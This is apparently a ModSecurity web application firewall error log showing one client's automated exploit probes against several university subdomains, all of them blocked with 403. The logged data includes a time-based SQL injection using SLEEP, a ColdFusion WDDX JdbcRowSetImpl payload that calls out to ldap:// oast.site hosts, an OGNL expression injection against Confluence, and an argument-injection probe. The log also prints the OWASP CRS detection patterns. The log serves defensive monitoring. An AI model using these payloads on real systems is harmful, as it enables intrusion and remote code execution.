[Tue Aug 29 11:31:45.446340 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQEGNAAAAAm"]
[Tue Aug 29 11:31:45.450710 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQA-@sAAAAi"]
[Tue Aug 29 11:31:45.455725 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQR468AAAAz"]
[Tue Aug 29 11:31:45.456812 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgeczdgdmn6qxs3.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAANsAU4AAAAD"]
[Tue Aug 29 11:31:45.460203 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQMrvgAAAAu"]
[Tue Aug 29 11:31:45.467014 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgp7ny7c41xd599.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQEGNEAAAAm"]
[Tue Aug 29 11:31:45.475449 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlg6ijw5fyekfdy8.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQkBX8AAAAC"]
[Tue Aug 29 11:31:46.318826 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ssCo-f0AAAPDn8cAAAAP"]
[Tue Aug 29 11:31:46.358184 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAN@5I4AAAAO"]
[Tue Aug 29 11:31:46.367026 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAPDn8gAAAAP"]
[Tue Aug 29 11:31:46.370294 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQMrvoAAAAu"]
[Tue Aug 29 11:31:46.374786 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQV4PcAAAA3"]
[Tue Aug 29 11:31:46.389065 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQEGNQAAAAm"]
[Tue Aug 29 11:31:47.378930 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAPMmKsAAAAY"]
[Tue Aug 29 11:31:47.407139 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAP5mKsAAAAM"]
[Tue Aug 29 11:31:47.424567 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAN@5JIAAAAO"]
[Tue Aug 29 11:31:47.425134 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQR47UAAAAz"]
[Tue Aug 29 11:31:47.425558 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAPDn8wAAAAP"]
[Tue Aug 29 11:31:47.429919 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQQymQAAAAy"]
[Tue Aug 29 11:31:47.439582 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQkBYYAAAAC"]
[Tue Aug 29 11:31:47.445656 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQSWOoAAAA0"]
[Tue Aug 29 11:31:47.446780 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAP@M20AAAAZ"]
[Tue Aug 29 11:31:47.448800 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAPDn80AAAAP"]
[Tue Aug 29 11:31:49.300351 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAANWgVsAAAAG"]
[Tue Aug 29 11:31:49.302238 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAPDn9EAAAAP"]
[Tue Aug 29 11:31:49.311606 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQR47wAAAAz"]
[Tue Aug 29 11:31:49.313244 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAPMmLEAAAAY"]
